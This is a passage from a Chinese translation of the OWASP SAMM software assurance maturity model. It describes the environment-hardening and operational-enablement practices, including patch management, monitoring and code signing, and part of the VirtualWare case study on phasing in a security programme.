用或品牌损失)等。对于造成技术故障的根本问题,确定 哪种类型的主动措施、审核或操作实践,以对最初检测到 安全事件或减轻其损坏也是很有帮助的。 此信息是对程序计划处理流程的具体反馈,因为它代 表组织长期以来所经受的真实安全影响。 结果 ✦每个事件后针对组 织改进的详细反馈; ✦对由漏洞和损坏带 来成本损失的粗略估 计; ✦利益相关方能够更 好地根据历史事件趋 势做出权衡的决策。 额外成功衡量标准 ✦>80%的事件在过去6 个月中记录了根本起 因和进一步的建议; ✦>80%事件过去6个 月中对度量指标进行 了整理。 额外成本 ✦组织对安全事件持 续执行深入研究和分 析而造成的开销。 ✦组织对安全事件度 量标准的持续收集和 审核而造成的开销。 额外人员 ✦安全审计员(3天/ 年) ✦经理(2天/年) ✦业务拥有者(2天/ 年) 相关等级 ✦政策与度量标准-3 74 环境强化 EH1 EH2 EH3 目标 了解应用程序和 软件组件的基本 操作环境。 通过强化操作环 境提高对应用程 序操作的信心。 以已知最佳实践 验证应用程序的 健康和操作环境 状态。 措施 A.维护操作环境 说明; B.确定并安装关 键的安全软件 升级和补丁。 A.建立常规补丁 管理流程; B.监控基准基础 架构配置状 态。 A.确定并部署相 关操作的保护 工具; B.为环境配置扩 展审计计划。 评估 ✦大多数项目是 否为操作环境记 录需求? ✦大多数项目是 否检查第三方软 件部件的安全更 新? ✦是否使用一个 持续连贯的处理 流程以对于关键 依赖的部件使用 安全更新和补 丁? ✦大多数项目是 否权衡了应用程 序的自动化检测 和环境的健康状 态? ✦利益相关方是 否意识到当进行 操作时用于保护 软件的额外工具 的选择? ✦常规审计是否 为大多数的项目 检查环境健康状 况? 结果 ✦开发团队清楚 理解了操作预期; ✦根据一个已充 分理解的时间表, 削减现有基础架 构下的高优先级 风险; ✦软件操作人员 对于基础架构的 关键安全维护而 配备的高级别计 划。 ✦对操作的系统 中的安全特性进 行了粒度验证; ✦正式预测对于 削减基础架构风 险时间表; ✦利益相关者持 续关注软件项目 的当前操作状态。 ✦通过分层检测 安全性强化了操 作环境; ✦建立并测量了 操作维护和操作 性能目标; ✦通过外部依赖 性的缺陷降低了 成功攻击的可能 性。 75 环境强化 EH1 了解应用程序和软件组件的基本操作环境 措施 A. 维护操作环境规范说明 对于每一个项目,应创建并维护一个预期操作平台的 具体定义。根据组织的组成,此规范说明应由开发人员、 利益相关者、支持和操作团队等共同创建。 开始创建该规范应首先根据软件的商业功能获得有关 此操作环境的所有真实详细信息。这些信息包括以下因素, 例如:处理器体系结构、操作系统版本、必备软件、冲突 软件等。此外,还需记录影响软件行为方式的关于操作环 境的任何已知用户或操作人员配置选项。 另外,确定在项目设计和实施阶段中提出的有关操作 环境的假设,并在规范说明中使用这些假设。 对于正在进行的项目,应至少每6个月对该规范说明进 行审核和更新。如果软件设计或预期的操作环境发生了更 改,则应更频繁地执行审核和更新。 B. 确定并安装关键的安全更新和补丁 大多数应用程序运行于另一大型软件堆栈之上,这些 软件由内置编程语言库、第三方组件和开发框架、基本操 作系统等组成。因为这个大型软件堆栈中任何模块的安全 缺陷都会影响该组织软件的整体安全性,所以必须安装技 术堆栈模块的重要安全更新。 同样,应执行对高风险依赖性的常规研究和持续监控, 以保证安全漏洞安装了最新补丁。确定可影响软件项目安 全状态的重要更新和补丁后,应制定相应计划,安排受影 响的用户和操作人员安装更新。根据软件项目的类型,此 操作的具体步骤和内容可能不同。 结果 ✦开发团队清楚理解 了操作预期; ✦根据一个已充分理 解的时间表,削减现有 基础架构下的高优先 级风险; ✦软件操作人员对于 基础架构的关键安全 维护而配备的高级别 计划。 成功指标 ✦>50%的项目在过去6 个月中更新了操作环 境规范说明; ✦>50%的项目在过去6 个月中更新了相关重 要安全补丁的列表。 成本 ✦持续扩充和维护操 作环境规范说明的项 目开销; ✦持续监控并安装重 要安全更新的项目开 销。 人员 ✦开发人员(1-2天/ 年) ✦架构师(1-2 天/ 年) ✦经理(2-4 天/年) ✦支持/操作人员(3 -4 天/年) 相关等级 ✦操作实现-2 76 环境强化 EH2 通过强化操作环境提高对应用程序操作的信心 措施 A. 建立常用补丁管理流程 从重要更新和补丁的专用应用程序转移到一个更加正 式的专门处理流程,应在组织中创建一个持续的流程,以 在操作环境中对软件基础架构持续使用安全补丁。 在最基本的形式上,此处理流程致力于针对安全补丁 的发布和应用时间间隔做出保证。为使此处理流程高效地 工作,通常组织对低优先级补丁接受高延迟,例如:低优 先级补丁的期限最多可以为30天,而重要补丁的延迟最多 仅为2天。 这项工作应主要由支持和操作人员执行,但是应当与 开发团队召开例会,以使项目与过去的更改和预定的升级 更新保持一致。 另外,开发人员应共享软件项目内部依赖的第三方组 件列表,从而使支持和操作人员可监控这些组件,并提示 开发团队在何时需要进行升级。 B. 监控基准环境配置状态 对于一个软件项目的基础架构,由于监控和管理各种 组件的补丁很复杂,应利用自动化工具来自动监控系统, 以保证配置的有效性。 很多商业工具和开源工具可提供这种类型的功能,因 此,项目团队应选择一个适合的基于组织需要的解决方案。 典型的选择标准包括:易于部署和自定义、组织平台和技 术堆栈的适用性、变更管理和警报的内置功能、度量标准 的收集和趋势追踪等等。 除对主机和平台检测以外,应对监控自动化进行自定 义,以执行应用程序特定的运行状况检测和配置验证。支 持和操作人员应与架构师和开发人员合作,以共同确定一 个给定软件项目的最佳监控数量。 最后,当部署了一个用于监控基础架构的配置状态解 决方案后,应由项目利益相关者在每周或者至少每季度对 意外警报或配置更改,进行一次收集和审核。 结果 ✦对操作的系统中的 安全特性进行了粒度 验证; ✦正式预测对于削减 基础架构风险时间表; ✦利益相关者持续关 注软件项目的当前操 作状态。 额外成功指标 ✦>80%的项目团队在 过去12个月中了解了 补丁管理处理流程。 ✦>80%的利益相关方 在过去6个月中意识到 了当前补丁状态。 额外成本 ✦组织进行补丁管理 和监视的持续开销; ✦扩充和许可基础架 构监控工具。 额外人员 ✦架构师(1-2天/年) ✦开发人员(1-2天/ 年) ✦业务拥有者(1-2 天/年) ✦经理(1-2天/年) ✦支持/操作人员(3 -4天/年) 相关等级 ✦ 77 环境强化 EH3 以已知最佳实践验证应用程序的健康和操作环境状态 措施 A. 确定并部署相关操作保护工具 为了在软件的操作环境中为软件构建一个更好的保证 用例,可使用额外的工具来增强系统的整体安全状态。不 同的操作环境会有很大的不同,因此应在项目环境中考虑 给定保护技术的适当性。 常用的保护工具包括:Web应用程序防火墙、Web服 务的XML安全网关、客户端/嵌入式系统的防篡改和模糊 化包、针对旧基础架构的网络入侵检测/防御系统、证据调 查的日志聚合工具、基于主机的完整性验证工具等。 根据组织和项目特定的知识,技术利益相关者应与支 持和操作人员合作,为业务利益相关者确定和推荐选定的 操作保护工具。如果在降低风险对比实施成本方面认为一 项投资有价值,则利益相关者应同意试进行、广泛展示和 持续维护的计划。 B. 为环境配置扩展审计程序 当执行例行的项目级审计时扩展审核,以纳入对与强 化操作环境相关的工件的检查。除了操作环境的最新说明 以外,审计过程还应包括对于当前补丁状态和自上次审计 的历史数据的检查。通过接入监控工具,审计过程还可以 验证有关应用程序配置管理和历史更改的关键因素。审计 过程还应当针对该软件架构类型可用的操作保护工具,检 查这些工具的使用情况。 基础架构的审计可在项目初始发布和部署后的任何时 间点进行,但应至少每6个月进行一次。对于旧系统或无开 发活动的项目,基础架构审计仍应由业务利益相关者执行 并审核。一个例外处理流程应被创建,以允许有特殊案例 的项目继续进行,但必须为抑制结果处理明确地分配时间 计划。例外应限制在不超过所有项目的20%。 结果 ✦通过分层检测安全 性强化了操作环境; ✦建立并测量了操作 维护和操作性能目标; ✦通过外部依赖性的 缺陷降低了成功攻击 的可能性。 额外成功指标 ✦>80%的利益相关方 在过去6个月中了解了 相关操作保护工具; ✦>75%的项目在过去6 个月中通过了基础架 构审计。 额外成本 ✦研究和选择操作保 护解决计划; ✦操作保护工具的建 立和许可; ✦维护保护工具的持 续操作开销; ✦关于基础架构审计 的持续项目开销。 额外人员 ✦业务拥有者(1天/ 年) ✦经理(1-2天/年) ✦支持/操作人员(3 -4天/年) 相关等级 ✦政策与遵守-2 78 操作实现 OE1 OE2 OE3 目标 实现开发团队和 操作人员之间对 于与安全相关的 关键数据的沟通 交流。 通过提供详细的 步骤为持续的安 全操作提高期望。 针对完整性而对 安全信息和部件 检验进行强制宣 传。 措施 A. 为部署获得的 重要的安全信 息; B. 为典型的应用 程序警报记录 流程。 A. 创建每次发布 的变更管理流 程; B.维护正式的操 作安全指南。 A.为操作信息扩 展操作审计计 划; B.对应用程序组 件执行代码签 名。 评估 ✦你是否递交了 关于多数软件发 布的安全记录? ✦大多数项目是 否都记录了与安 全相关的警报和 产生错误的条 件? ✦大多数项目是 否正在使用一个 已理解的变更管 理处理流程? ✦项目团队是否 为每个软件发布 递交了一份操作 安全手册? ✦大多数项目是 否为了恰当的操 作安全信息,而去 审计检查每个发 布? ✦软件组件的代 码签名是否按照 一致的处理流程 被经常进行? 结果 ✦通过更好地理 解正确操作,为软 件安全状态进行 特定的改进; ✦操作人员和用 户意识到各自为 确保安全部署的 职责; ✦对于关键的安 全信息,改善了软 件开发人员和用 户之间的交流。 ✦针对与安全相 关的更新,随软件 发布而提供的详 细指南; ✦每个应用程序 为安全操作步骤 更新了的信息库; ✦对开发人员、操 作人员和用户的 操作预期保持一 致。 ✦整个组织都理 解了对于与安全 相关文档的期望; ✦利益相关者能 根据部署和操作 的反馈,做出更好 的权衡决策; ✦操作人员和/或 用户能够独立验 证软件发布的完 整性。 79 操作实现 OE1 实现开发团队和操作人员之间对于与安全相关的关键数据的沟通交流 措施 A. 为部署操作捕获重要的安全信息 利用特定软件的知识,项目团队应当确认与安全相关 的配置和操作信息,并将其传达给用户和操作人员。这样 就使部署站点上软件的实际安全状态能够按照项目团队设 计人员的意图运行。 此分析应从架构师和开发人员构建的软件内置安全特 征列表开始。根据该列表,还应获得关于配置选项及其安 全影响的信息。对于提供了多个不同部署模块的项目,应 记录每个模块相关安全问题的信息,以更好地让用户和操 作人员知道选择后所带来的影响。 整体而言,此列表应该言简意赅,并旨在提供最关键 的信息。一旦初始建立列表后,为取得同意,应由项目团 队和组织利益相关方进行审核。另外,为确保可理解和操 作相关信息,与选定的操作人员和用户共同审核该列表会 非常高效。项目团队应对每个发布和更新审核该信息,且 必须至少每6个月进行一次。 B. 为典型的应用程序警报记录过程 借助软件行为方式的特定知识,项目团队应确定需要用 户/操作人员注意的最重要的错误和警报消息。对于每个已 确定的事件,应明确并获得用户/操作人员为响应此事件而 采取适当操作的信息。 对于软件可能产生的很大一组事件,就软件的业务目 标而言,选择优先级最高的集合。该集合应该包括与安全 相关的任何事件,但也可能包含与软件运行健康状况和配 置状态相关的关键错误和警报。 为每一个事件捕获可操作的建议,以为通知用户和操 作人员所需的下一步操作和导致事件的潜在根本原因。这 些处理流程必须由项目团队审核,并每6个月为每个主要的 产品发布更新一次,但也可以进行得更频繁,例如在每次 发布时。 结果 ✦通过更好地理解正 确操作,为软件安全状 态进行特定的改进; ✦操作人员和用户意 识到各自为确保安全 部署的职责; ✦对于关键的安全信 息,改善了软件开发人 员和用户之间的交流。 成功指标 ✦>50%的项目在过去6 个月中更新了安全信 息部署; ✦>50%的项目在过去6 个月中更新了事件的 操作流程。 成本 ✦来自维护安全信息 部署的持续项目开销; ✦来自维护关键操作 流程的持续项目开销。 人员 ✦开发人员(1-2 天/ 年) ✦架构师(1-2 天/ 年) ✦经理(1 天/年) ✦支持/操作人员(1 天/年) 相关等级 ✦ 80 操作实现 OE2 通过提供详细的步骤为持续的安全操作提高期望 措施 A. 创建每次发布变更的管理过程 为了在软件中正式地更新与用户和操作人员相关的改 变,每个发布版本都必须包括与升级和首次安装相关联的 变更管理处理流程程序。总而言之,目标是确定预期的随 附步骤,以确保部署成功,且不会导致过多的停机时间或 安全状态的下降。 要在开发过程中建立这些流程,项目团队应设置简便 的内部流程来捕获会影响部署的相关项。在开发周期的早 期使用此流程会非常高效,这样可将这些信息保留,并在 需求分析、设计和编码阶段时确定。 在每次发布前,项目团队应将此列表作为一个整体进 行审核,以检查完整性和可行性。对于一些项目,一个给 定的版本发布伴随着大量的变更流程,对这些变更可进行 授权特殊处理,例如构建自动升级脚本以避免部署中发生 错误。 B. 维护正式的操作安全指南 从获得的关键软件事件信息以及处理每个事件的流程 开始,项目团队应建立并维护正式的指南,以捕获用户和 操作人员需要了解到的所有的与安全相关的信息。 最初,应根据有关系统的已知信息建立该指南,这些 信息包括:与安全相关的配置选项、事件处理流程、安装 和升级指南、操作环境规范说明、有关部署环境的安全相 关假设,等等。以此扩展开来,正式的操作安全指南应详 细阐述上述每一项以涵盖更多信息,这样大多数用户和操 作人员都会了解到可能提出的所有问题。对于大型或复杂 的系统,这可能会很挑战,因此项目团队应与组织利益相 关方合作,共同确定文档的适当级别。另外,项目团队应 记录任何会增强安全性部署的建议。 操作安全性指南初始创建后,应由项目团队进行审核, 并随每次发布进行更新。 结果 ✦针对与安全相关的 更新,随软件发布而提 供的详细指南; ✦每个应用程序为安 全操作步骤更新了的 信息库; ✦对开发人员、操作人 员和用户的操作预期 保持一致。 额外成功指标 ✦>50%的项目在过去6 个月中更新了更改管 理处理流程; ✦>80%的利益相关方 在过去6个月中大概了 解了操作安全指南的 状态。 额外成本 ✦维护改变管理程序 的持续项目开销; ✦维护操作安全指南 的持续项目开销。 额外人员 ✦开发人员(1-2天/ 年) ✦架构师(1-2天/年) ✦经理(1天/年) ✦支持/操作人员(1 天/年) 相关等级 ✦环境强化-1 81 操作实现 OE3 针对完整性而对安全信息和部件检验进行强制宣传 措施 A. 为操作信息扩展审计程序 当执行常规的项目级审计时扩展审核,以包括对涉及 安全性操作实现组件的检查。应对项目进行检查,以确保 其具有涉及软件细节的已更新并完整的操作安全指南。 这些审计应在开发周期快要结束并接近发布的时候开 始进行,但是必须在发布前完成并通过。对于旧系统或不 活动的项目,这种审计应当被执行,完成一次性的解决结 果,并验证审核标准遵守,随后则不再需要针对操作实现 进行另外的审核。 发布前,必须由利益相关者对审计结果进行审核。一 个例外流程应当被创建,以允许未通过审计的项目继续进 行发布,但是这些项目应具有修正错误的具体时间期限。 例外应限制在不超过所有活动项目的20%。 B. 为应用程序组件执行代码签名 虽然经常与特殊目的的软件共同使用,代码签名允许 用户和操作人员执行软件的完整性检查,这样它们就可以 加密验证模块或发布版本的真实性。通过对软件模块进行 签名,项目团队能使部署的操作得到更高的保证,从而避 免已部署的软件在其操作环境中被破坏或修改。 对代码进行签名会造成组织管理签名凭证的开销。一 个组织必须遵循安全的密钥管理流程,以确保签名密钥的 持续保密性。当处理任何加密的密钥时,项目利益相关方 还必须要考虑处理有关加密的常见操作问题的计划,例如: 密钥循环、密钥泄露或密钥丢失。 由于代码签名并非对所有部件都适用,架构师和开发 人员应与安全审计员和组织利益相关方合作,确定应进行 签名的软件部件。随着项目的发展,每次发布都应对此列 表进行审核,特别是当添加新模块或对以前签名的组件进 行更改时。 结果 ✦整个组织都理解了 对于与安全相关文档 的期望; ✦利益相关者能根据 部署和操作的反馈,做 出更好的权衡决策; ✦操作人员和/或用户 能够独立验证软件发 布的完整性。 额外成功指标 ✦>80%的项目在过去6 个月中更新了操作安 全指南; ✦>80%的利益相关方 在过去6个月中大致了 解了代码签名选项和 状态。 额外成本 ✦操作指南审计的持 续项目开销; ✦维护代码签名凭证 的持续组织开销; ✦代码模块确定和签 名的持续项目开销。 额外人员 ✦开发人员(1天/年) ✦架构师(1天/年) ✦经理(1天/年) ✦安全审计员(1-2 天/年) 相关等级 ✦ 82 案例分析 对一个案例进行从头到尾的讲解 83 本节详细分析了一个使用SAMM的特定商业案例。该案例描 述了组织在建立安全保证方案时,如何将路线图模版作为指导, 适应可能的最佳实践,并考虑组织的特定风险。 84 VirtualWare 案例分析:中型独立软件供应商 业务概况 VirtualWare是其所在市场的主导 者,专门提供虚拟化的综合应用平台, 以帮助企业将他们的应用程序界面整 合到一个单一的环境中。他们的技术 为多个操作环境提供了服务器应用程 序和内置的桌面客户端,其中包括微 软、苹果和Linux平台。 该组织是一个中型组织企业 (200-1000名员工),并已在世界各主 要国家设立了分公司以开展全球业 务。 组织 VirtualWare已使用了超过8年的 时间一直在开发自己的核心软件平 台。在此期间,由于网页界面较少被 使用,他们仅需面对少量的普通Web 漏洞风险。大多数VirtualWare的平台 运行在一个基于服务器的系统或者运 行在桌面上的客户端。 最近,VirtualWare开始了一系列 的新项目,以通过Web技术实现他们 的客户端和服务器界面。通过了解有 关Web的常见攻击程度,使该组织审 核其软件的安全战略并确保充分解决 可能存在的威胁,以推动组织向前发 展。 此前,该组织已开展应用程序代 码的基本审核,但更加注重于性能和 功能,而非安全性。VirtualWare开发 人员已使用一些代码质量分析工具来 发现错误并在代码中解决它们。 考虑到这一点,高层管理团队已 经制定了一个战略目标,以审核他们 应用程序目前的安全状况,并在其中 识别、去除、预防漏洞的最好方法。 环境 VirtualWare使用混合的Java、 C++和Microsoft. NET技术开发他们 的虚拟化技术。他们的核心应用虚拟 化技术已用C++编写,并已有了针对错 误和安全性的一系列审核,但目前还 没有正式的处理流程已识别和修复已 知或未知的安全错误。 虽然后端系统使用了微软和C++ 技术,VirtualWare选择了Java以支持 他们的Web技术。开发团队专注于的 网络界面则主要由Java开发人员编 制。 VirtualWare雇用了超过300名开 发人员,在他们工作的项目基础上, 与其他工作人员分成各个团队。共有 12支团队,每队大约有20-40名开发人 员。每个团队关于软件安全性都仅有 很少的经验,虽然高级开发人员对于 代码执行了基本的评估,但是安全性 并没有作为组织的一个重要目标。 VirtualWare中的每个团队采用了 不同的开发模型。目前使用的两个主 要方法是Agile SCRUM和迭代瀑布方 法。对于软件安全性,IT部门或项目架 构师都没有指导意见。 85 核心挑战 ✦应用程序功能的快速发布,以确保 保持对他们竞争对手的竞争优势; ✦有关软件安全性概念的有限经验— 目前仅有很少的活动任务是与安全相 关的; ✦有经验的开发人员离开该组织,并 由缺乏经验的开发人员取代; ✦多种技术被用于应用程序,而旧的 应用程序自初始建立以后没有被更 新; ✦不了解现有的安全情形或组织正面 临的风险。 VirtualWare希望把重点放在如何 为客户安全地开发新Web应用程序。 因此,对于实施安全保证计划的最初 重点在于对他们的开发团队进行教育 和意识培养,以及提供一些关于安全 编码的基础技术指导和测试标准。 该组织此前曾通过他们的电子邮 箱地址:support@virtualware.net,收 到了来自客户关于获得错误和安全漏 洞信息的请求邮件。但是,由于这只 是一个普通的支持邮箱地址,现有的 请求在组织内并不是总能传递到正确 的团队并得到正确处理。另外, VirtualWare还明确了实施一个正式的 安全漏洞响应计划的需求。 执行策略 在一个组织内执行一项安全保证 计划是一个长期的策略,不仅对开发 人员的文化会带来显着的影响,而且 会影响对于开发并交付应用程序采取 的企业处理流程。这一策略的执行被 设置在12个月内完成,但由于该组织 的规模,在这一指定时间内将会比较 容易地实施。 86 第一阶段(第1至3个月)- 意识培养和规划 VirtualWare先前已发现,他们组织对于应用程序安全性威胁仅有有限的知 识和意识,以及有限的安全编码经验。在VirtualWare中部署计划的第一阶段集 中于对开发人员的培训,并执行相关指导和计划,以确定当前的安全漏洞。 VirtualWare的开发团队在安全编码技术方面仅有有限的安全经验,因此, 开发的初始培训计划可以是向组织内的开发人员提供防御性的编程技术。 在组织内有超过300名的开发人员并支持多种开发语言,对于VirtualWare关 键的挑战之一是提供一个教育课程,从纯技术的角度,向开发人员讲授一些基本 的安全编码概念。这个初始教育课程的主要目的在于编码技术和测试工具。组织 并进行为期一天的课程,以讲授涵盖安全编码的基础知识。 VirtualWare意识到,他们的很多应用程序都有漏洞,并且缺少真正的策略, 用以明确已有的漏洞,并在一个合理的时间框架内解决这些问题。一个基本的风 险评估方法已被实施,该组织并对于现有的应用程序平台进行了审核。 这一阶段还包括执行一组概念以强化开发团队的安全工具。开发团队已经有 了许多工具用于执行质量类型的评估。对于代码审核和安全测试工具进行的额外 调查也已被执行。 预期目标 在该项目的这一阶段,VirtualWare执行了以下SAMM的实践与措施。 SM1 A. 评估整体业务风险概况; B. 建立并维护保证计划路线图。 EG1 A. 实施技术安全意识的培训; B. 建立并维护技术指导。 SR1 A. 从业务功能推导出安全需求; B. 为需求评估安全和遵守指导。 CR1 A. 根据已知安全需求建立审核检查列表; B. 为高风险代码执行定点审核。 ST1 A. 从已知安全需求推出测试用例; B. 为软件发布执行渗透测试。 VM1 A. 为安全事件确定联络点; B. 建立非正式安全响应团队。 87 为了实现这些成熟度等级, VirtualWare在这一阶段实施了一系列 活动计划。下列措施被执行: ✦为所有开发人员进行1天的(高级别 的)安全编码课程; ✦建立一个为在组织内所使用技术的 应用程序安全的技术指导白皮书; ✦建立一个风险处理流程,并为应用 程序平台执行高级别的商业风险评估 和业务风险审核; ✦为开发人员准备初步的技术指导和 标准; ✦为组织目前的重大风险在应用程序 平台上执行短代码审核; ✦为项目开发测试和使用用例,并为 应用程序评估用例; ✦为应用程序安全初始化任命一个角 色; ✦为下一阶段的保证计划产生一个战 略路线图的草案。 由于VirtualWare内部对于专业知 识技术的匮乏,公司与第三方安全咨 询公司展开合作,以协助建立培训计 划,并协助编写组织的威胁模型和战 略路线图。 在这一阶段所面临的主要挑战之 一,就是让所有300名开发人员通过为 期一天的培训课程。为了实现这一目 标,VirtualWare举行了20天的课程, 每次只有每个开发团队的少数人员参 加课程。这减少了在培训期间对人力 资源的整体影响。 在项目的这一阶段,VirtualWare 投入了大量的资源到风险审核处理过 程和组织的业务风险审核过程中。虽 然为这些任务付出了相当大的努力, 但是必须确保VirtualWare执行的下一 步骤,是与企业组织所面临的风险联 接在一起的。 VirtualWare的管理层收到了积极 的反馈信息,其中大多数来自参加了 培训项目的组织内部开发人员。虽然 培训课程没有提供足够详细的信息, 但是开发人员认为,该初始培训已提 供了一些可以帮助他们立即在每天编 写安全代码的基本技能。 执行成本 在项目的这个阶段投入了大量的 内部资源和成本。这一阶段的相关成 本有三种不同类型。 内部资源需求 内部资源使用在该阶段应用程序 安全初始活动的内容创建、研讨会组 织和审核之中。资源使用以每个角色 总天数的方式展现。 开发人员 14天 业务拥有者 8天 架构师 10天 QA测试人员 3天 经理 8天 安全审计员 9天 培训资源需求(该阶段每人的培训) VirtualWare内的每个开发人员要 求参加一个培训课程,因此,每一个 开发人员分配到了为期一天的应用程 序安全计划。 开发人员(每人) 1天 外包资源 由于VirtualWare内部知识的匮 乏,外部资源被用来协助内容创建, 以及为开发人员创建/提供培训计划。 安全顾问 15天 培训顾问 22天 88 第二阶段(第3至6个月)- 培训和测试 VirtualWare在第一阶段确定,他们的很多应用程序都包含了可能受到来自 外部威胁的漏洞。因此,这一阶段的主要目标之一是进行基本能力测试和审核, 以在代码中确定漏洞并解决它们。 在这一实施阶段,最大的挑战之一是引进自动化工具以尽可能多得覆盖代码 并发现弱点。在过去,开发人员对于使用自动化工具非常困难,因此,使用新的 工具被视作为一个巨大的挑战。 为了确保在组织内成功推出自动化工具,VirtualWare开始分阶段的进行。 这些工具将首先提供给团队的高级领导人,并在一段时间内在网上向开发人员发 布。团队被鼓励使用这些工具,但是,对于他们的使用没有进行正式的处理。 这一实施阶段也被看作为一个更加正式的教育和安全意识培训计划。开发人 员被要求在Web服务和数据验证方面进行相比于前次培训更加具体的培训。为期 六个小时的具体培训新课程在这两个重点领域被制作。VirtualWare还为架构师 和经理提供了的额外训练课程,并在通过组织内举行了一个宣传活动。 预期目标 在该项目的这一阶段,VirtualWare执行了以下SAMM的实践与措施。 SM2 A. 根据业务风险将数据和应用程序分类; B. 建立并衡量每个分组的安全目的。 EG2 A. 实施针对特定角色的应用程序安全培训; B. 聘用安全指导专家增强项目团队。 TA1 A. 建立并维护特定应用程序的威胁模型; B. 根据软件架构建立攻击者概况。 DR1 A. 确定软件攻击层面; B. 根据已知安全需求分析设计。 CR2 A. 使用自动化的代码分析工具; B. 将代码分析集成到开发流程当中。 ST2 A. 使用自动化的安全测试工具; B. 将安全测试整合到开发过程中。 OE1 A. 为部署获得的重要的安全信息; B. 为典型的应用程序警报记录流程。 89 为了实现这些成熟度等级, VirtualWare在这一阶段实施了一系列 活动计划。下列措施被执行: ✦为质量保证测试人员、经理和架构 师提供额外的教育及培训课程; ✦将数据资产进行分类,并设置安全 目标; ✦将威胁评估方法开发成一种利用攻 击树和档案的威胁建模方法; ✦审核并确定每个应用程序平台的安 全需求; ✦介绍自动化工具以协助代码覆盖和 现有应用程序以及新代码库的安全分 析; ✦审核并强化现有的渗透测试计划; ✦加强现有的软件开发生命周期,以 支持安全测试作为开发处理过程的一 部分。 VirtualWare调整了现有的应用程 序安全培训计划,以提供一个较小的 技术版本,作为一个商业应用程序的 安全意识计划。这是一个只有4个小时 的短课程,并将培训人员扩大到组织 的经理和业务拥有者。 对现有的代码审核和渗透测试计 划的一个高级别审核,确定该处理过 程不足,并需要得到加强,以为应用 程序安全漏洞提供更好的测试和结 果。一个团队已着手实施执行渗透测 试和代码审核的新计划。作为该计划 的一部分,每个项目团队的每个高级 开发人员被分配大约4天时间对于他 们的应用程序去执行高级别的源代码 审核。 VirtualWare的管理层了解到,基 础设施和应用程序紧密集成在一起, 并在这一阶段,对应用程序平台(基 础设施)的操作方面进行了审核。这 个阶段的重点在于基础设施需求,以 及在推荐部署的硬件和应用程序接口 之间的应用程序集成特征。 在这一阶段,战略路线图和应用 程序安全的方法由项目团队进行了审 核。本次审核和更新的目的是对数据 资产进行正式地分类,并设置与数据 资产和应用程序相关业务风险的适当 等级。因此,项目团队能够为这些应 用程序设定安全目标。 执行成本 在项目的这个阶段投入了大量的 内部资源和成本。这一阶段的相关成 本有三种不同类型。 内部资源需求 内部资源使用在该阶段应用程序 安全初始活动的内容创建、研讨会组 织和审核之中。资源使用以每个角色 总天数的方式展现。 开发人员 8天 业务拥有者 5天 架构师 10天 QA测试员 3天 经理 8天 安全审计员 15天 支持操作 2天 培训资源需求(该阶段每人的培训) 更多VirtualWare内的人员被要求 参加这一培训课程,因此,不同的人 员角色被分配到了时间以参见应用程 序安全的培训。 架构师(每 人) 1天 经理(每人) 1/2天 业务拥有 者(每人) 1/2天 外包资源 由于VirtualWare内部知识的匮 乏,外部资源被用来协助内容创建, 以及为开发人员创建/提供培训计划。 安全顾问 22天 培训顾问 5天 90 第三阶段(第6至9个月)- 架构和基础设施 在VirtualWare内实施保证计划的第三阶段,建立于前面的实施阶段基础上, 并将重点设定于风险建模、架构、基础设施和业务实现能力上。 该阶段的主要挑战是将应用程序平台和组织的操作方面更紧密的结合在一 起。在前一阶段,VirtualWare的团队引入了漏洞管理和有关应用程序安全性的 操作。在这一阶段,VirtualWare执行这些领域的下一步骤,并介绍了事故清除 应急处理,以及详细的变更控制程序。 VirtualWare为此实施措施选择了启动两个新的领域。虽然VirtualWare不受 法律法规的影响,但是他们很多的客户已经开始询问这些平台是否可以通过了相 关法律法规。一个小团队已经在VirtualWare内建立,以确定相关的规定驱动因 素并建立一个驱动列表。 在前一阶段,VirtualWare引入了一系列新的自动化工具,以协助审核并确 定漏洞。虽然不是集中在这一阶段,但开发团队都采用了新的工具,并报告说, 他们已经开始从这些工具的使用中获益。 预期目标 在该项目的这一阶段,VirtualWare执行了以下SAMM的实践与措施。 PC1 A. 确定并监控外部的遵守驱动因素; B. 建立并维护遵守指导。 TA2 A. 建立并维护每个项目的滥用用例模型; B. 为威胁的度量采用一个权重系统。 SR2 A. 为资源和能力建立一个访问控制矩阵; B. 根据已知风险指定安全需求。 SA1 A. 维护推荐的软件框架列表; B. 将安全原则明确运用到设计中。 DR2 A. 检查提供安全机制的完整性; B. 为项目团队部署设计审核服务。 VM2 A. 建立一致的事件响应流程; B. 采用安全事件报告流程。 OE2 A. 创建每次发布的变更管理流程; B.维护正式的操作安全指南。 91 为了实现这些成熟度等级, VirtualWare在这一阶段实施了一系列 活动计划。下列措施被执行: ✦为组织内的项目定义并公布关于安 全需求和安全架构的技术指南; ✦确定并记录合规审查和监管需求; ✦为应用程序基础设施的安全性确定 并创建指南; ✦创建一个已通过的发展框架的定义 列表; ✦加强在VirtualWare内使用现有的威 胁建模过程; ✦采用一个事件响应计划,并准备一 个安全公布处理程序; ✦为所有项目引入变更管理程序和正 式的指南。 为配合在上一阶段针对开发人员 引入的自动化工具,安全编码技术的 正式技术指导也被引入了组织。这些 技术指导都是关于编程语言和技术的 详细技术文档,以及对于每个相关语 言/应用程序安全编码技术所提供的指 导。 随着将教育和意识宣传计划、技 术指导、为协助开发人员而引进自动 化工具作为一个混合的方法, VirtualWare开始注意到明显不同的代 码被纳入到其应用程序的交付产品版 本中。开发人员将根据使用工具和参 见培训所提供的积极反馈在计划中变 成了现实。 VirtualWare的项目团队有史以来 第一次为他们的安全性以及应用程序 平台的设计负责。在这一阶段,一个 正式地审核处理程序以及对于最佳实 践的验证由每个团队执行。有些团队 发现在安全性和业务设计之间存在差 距,这些差距需要加以审核。一个正 式的计划已部署,以确保解决这些差 距问题。 一个正式的事故响应计划和变更 管理处理流程在项目的这一阶段被引 入。这是一个艰难的实现过程, VirtualWare团队最初很难适应这些处 理流程,因为影响到他们的企业文化, 另外,业务操作十分困难。然而,随 着时间的推移,每个团队成员在新的 处理流程中明确了新的价值,并且, 在执行期间所产生的改变也被团队得 到了认可。 执行成本 在项目的这个阶段投入了大量的 内部资源和成本。这一阶段的相关成 本有两种不同类型。 内部资源需求 内部资源使用在该阶段应用程序 安全初始活动的内容创建、研讨会组 织和审核之中。资源使用以每个角色 总天数的方式展现。 开发人员 5天 业务拥有者 6天 架构师 7天 QA测试员 10天 经理 9天 运营支持 人员 3天 外包资源 由于VirtualWare内部知识的匮 乏,外部资源被用来协助内容创建, 以及为开发人员创建/提供培训计划。 安全顾问 20天 92 第四阶段(第9至12个月)- 监管和操作安全 在VirtualWare内实施保证计划的第四阶段,通过强化组织内现有的安全功 能,继续先期的阶段。现在,VirtualWare已实施了很多关键的应用安全程序安 